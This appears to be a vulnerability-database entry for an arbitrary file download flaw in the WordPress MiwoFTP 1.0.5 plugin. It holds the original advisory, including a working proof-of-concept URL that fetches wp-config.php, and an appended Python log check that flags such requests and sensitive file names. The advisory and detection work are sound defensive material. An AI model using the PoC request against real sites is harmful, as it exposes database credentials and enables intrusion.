Vendor: MiwoFTP
By: Necmettin COSKUN
CVSS: 7.5 (HIGH)
Arbitrary File Download
CWE: 434
Product Name: MiwoFTP
Affected Version From: 1.0.5
Affected Version To: 1.0.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:miwisoft:miwoftp:1.0.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7/Chrome/Firefox
2015

WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit

WordPress MiwoFTP Plugin 1.0.5 suffers from an arbitrary file download vulnerability. An attacker can exploit it by sending a crafted HTTP request to the vulnerable server to download any file from that server.

Mitigation:

Update to the latest version of the MiwoFTP plugin.

Exploit-DB raw data:

# Exploit Title   : WordPress MiwoFTP Plugin 1.0.5 Arbitrary File Download Exploit
# Vendor          : Miwisoft LLC
# Vendor Homepage : http://www.miwisoft.com
# Version         : 1.0.5
# Tested on       : Win7/Chrome/Firefox
# Exploit Author  : Necmettin COSKUN => @babayarisi
# Discovery date  : 04/15/2015
  

MiwoFTP is a file manager plugin for WordPress.

  
Description
================
WordPress MiwoFTP Plugin 1.0.5 suffers from an arbitrary file download vulnerability.

PoC Exploit
================
 http://localhost/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
  
================
#RCE/XSS/CSRF by Gjoko 'LiquidWorm' Krstic

#http://www.exploit-db.com/exploits/36763/
#http://www.exploit-db.com/exploits/36762/
#http://www.exploit-db.com/exploits/36761/
================

Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
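
Added example, not part of the original advisory or the plugin's code: a log check that finds requests carrying the PoC's parameters (`page=miwoftp`, `action=download`, `item=`) in a combined-format web access log and marks those that name sensitive files. The log lines, the sensitive-file list and the function names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: file names treated as sensitive on a WordPress host; extend per site.
SENSITIVE_RE = re.compile(r'(?:^|/)(?:wp-config\.php|\.htaccess|\.htpasswd)$', re.I)

def classify(line):
    """Return a finding dict for a MiwoFTP download request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # parse_qs percent-decodes values, so encoded file names are matched too.
    q = {k: v[-1] for k, v in parse_qs(url.query).items()}
    if not url.path.endswith("/wp-admin/admin.php"):
        return None
    if q.get("page") != "miwoftp" or q.get("action") != "download":
        return None
    item = q.get("item", "")
    return {"client": line.split(" ", 1)[0], "dir": q.get("dir", ""), "item": item,
            "sensitive": bool(SENSITIVE_RE.search(item))}

def summarize(lines):
    """Group MiwoFTP download findings by client address."""
    by_client = defaultdict(list)
    for line in lines:
        finding = classify(line)
        if finding:
            by_client[finding["client"]].append(finding)
    return dict(by_client)

# Constructed sample log lines (documentation address ranges), not real traffic.
_REQ = "/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp"
SAMPLE_LOG = [
    f'203.0.113.7 - - [15/Apr/2015:10:02:11 +0000] "GET {_REQ}&action=download&dir=/&item=wp-config.php&order=name&srt=yes HTTP/1.1" 200 3120',
    f'203.0.113.7 - - [15/Apr/2015:10:02:15 +0000] "GET {_REQ}&action=download&dir=/&item=wp%2Dconfig.php HTTP/1.1" 200 3120',
    f'198.51.100.4 - - [15/Apr/2015:10:05:40 +0000] "GET {_REQ}&action=download&dir=/uploads&item=logo.png HTTP/1.1" 200 5120',
    f'198.51.100.4 - - [15/Apr/2015:10:05:42 +0000] "GET {_REQ}&dir=/ HTTP/1.1" 200 900',
    '192.0.2.9 - - [15/Apr/2015:10:06:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 7000',
]

if __name__ == "__main__":
    for client, findings in summarize(SAMPLE_LOG).items():
        for f in findings:
            level = "ALERT" if f["sensitive"] else "review"
            print(f"{level} {client} downloaded {f['dir']!r} / {f['item']!r} via MiwoFTP")
```

Hits on hosts that still run version 1.0.5 are the ones to investigate first; the mitigation above remains updating the plugin.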